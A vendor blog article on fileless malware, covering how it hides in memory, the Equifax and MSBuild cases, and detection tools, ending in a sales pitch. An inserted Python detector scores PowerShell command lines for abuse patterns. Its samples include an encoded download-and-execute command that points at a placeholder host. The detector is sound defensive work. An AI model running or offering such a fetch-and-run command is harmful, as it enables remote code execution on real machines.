Exposing Fileless Malware
After creating a formula that makes him imperceptible to the human eye, the title character in H.G. Wells’ 1897 novel “The Invisible Man” makes plans to use his condition to launch a reign of terror. Today, malware authors are giving that plot an update for the digital age with a particularly menacing type of software.
Fileless malware displays none of the usual indicators of an attack, making it practically invisible to traditional signature-based antivirus and antimalware tools. That’s why analysts claim these attacks are 10 times more likely to succeed than file-based attacks.
Fileless attacks grew by nearly 900 percent in 2020, according to research from WatchGuard Technologies’ ThreatLab. Researchers say this surge is directly related to the mass transition to remote work in response to the pandemic. A high percentage of fileless attacks target remote workers using unsecured endpoint devices such as PCs, laptops, tablets and smartphones.
Like viruses, spyware, ransomware and other threats, fileless malware typically infiltrates systems through phishing emails, malicious downloads or infected links. After that, however, it exhibits very different behaviors.
Under the Radar
Instead of piggybacking on an infected file, fileless malware injects malicious code into legitimate programs that have already been installed on targeted systems. The code is never stored in a file or installed on the infected machine — it simply loads directly into the computer’s memory or registry.
Once executed, the code commonly exploits legitimate scripting frameworks such as PowerShell to spread laterally through the network, infecting multiple machines. It performs reconnaissance, collects sensitive information, and then disappears without a trace when the infected computer is rebooted.
The 2017 Equifax breach is perhaps the most notable example of a fileless attack. The malware exploited a command injection vulnerability to access dozens of the credit bureau’s web servers. It remained undetected for more than two months, ultimately harvesting the personal information of more than 160 million consumers.
More recently, researchers discovered that malicious actors have been using a free Microsoft software development application called MSBuild to infiltrate companies and deploy remote access tools (RATs) on computers. Once installed, the RATs execute code in memory to steal passwords, disable security tools and take full control of the machines.
Detection and Prevention
Although these attacks are quite sophisticated, there are steps you can take to limit your risk. Content-filtering solutions can help block the initial infection by scanning web applications, email and text messages to identify malware signatures. If fileless malware does infiltrate a system, antimalware solutions that use heuristics and behavior-based techniques can often detect it in the early stages of an attack.
An open-source pattern-matching tool called YARA has also been effective in identifying fileless malware. YARA has a rules library that contains characteristics and indicators of nearly 2,000 malware families. Users can simply search across their IT infrastructure for patterns that match any of those rules.
Endpoint protection platform (EPP) solutions can help detect and block threats at the device level. These integrated solutions typically include antivirus, antimalware, data encryption, personal firewalls, intrusion prevention and data loss prevention. Additionally, more organizations are implementing endpoint detection and response (EDR) solutions that use machine learning and continuous monitoring to identify stealthy threats that lack the usual clues and artifacts of an infection. These tools “learn” what malicious files look like based on a variety of traits.
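To make the behavior-based detection described above concrete, here is an added example (not code from the original article or from any vendor product) that scores PowerShell process command lines as an EDR sensor might record them, decoding an -EncodedCommand payload so the script itself is inspected rather than the opaque base64 blob. The indicator patterns, their weights, the threshold and the sample events are constructed assumptions for illustration.

```python
import base64
import re
from typing import List, Optional, Tuple

# Heuristic indicators of in-memory PowerShell abuse (assumed weights, not a vendor rule set).
INDICATORS = {
    r"-enc(odedcommand)?\b": 3,                            # base64-encoded script
    r"\biex\b|invoke-expression": 3,                       # evaluate text as code
    r"downloadstring|downloadfile|invoke-webrequest": 3,   # fetch code over the network
    r"\[reflection\.assembly\]::load|frombase64string": 3,  # load assemblies from memory
    r"-w(indowstyle)?\s+hidden": 2,                        # hide the console window
    r"-e(?:xec(?:utionpolicy)?|p)\s+bypass": 2,            # disable script policy
    r"-nop(rofile)?\b": 1,                                 # skip profile (also common in automation)
}
# Matches -e / -ec / -enc / -EncodedCommand followed by the base64 blob.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

def decode_encoded_command(cmdline: str) -> Optional[str]:
    # PowerShell encodes the script as UTF-16LE before base64; reverse both steps.
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_command_line(cmdline: str) -> Tuple[int, List[str]]:
    """Score one command line; the decoded script is scanned instead of the blob."""
    decoded = decode_encoded_command(cmdline)
    text = ENCODED_RE.sub(" -encodedcommand ", cmdline)
    if decoded:
        text += " " + decoded
    text = text.lower()
    hits = [pat for pat in INDICATORS if re.search(pat, text)]
    return sum(INDICATORS[p] for p in hits), hits

def flag_suspicious(cmdlines: List[str], threshold: int = 5) -> List[Tuple[str, int]]:
    """Return (cmdline, score) for events whose score reaches the threshold."""
    scored = ((line, score_command_line(line)[0]) for line in cmdlines)
    return [(line, s) for line, s in scored if s >= threshold]

# Constructed sample command lines; the URL is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
    + base64.b64encode("IEX (New-Object Net.WebClient).DownloadString("
                       "'http://constructed.invalid/a.ps1')".encode("utf-16-le")).decode(),
    "powershell.exe -Command Get-ChildItem C:\\Users\\alice\\Documents",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]
```

Only the first event is flagged; the signed backup script that merely bypasses execution policy scores below the threshold, which is the kind of weighting that keeps a behavior-based detector from drowning in routine administration.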
Unlike the character in Wells’ story, fileless malware is no fantasy. As these insidious attacks become increasingly frequent, organizations must develop a new approach to malware prevention. Through our SSD Assurance program, we can deliver the services and solutions needed to expose and prevent these threats.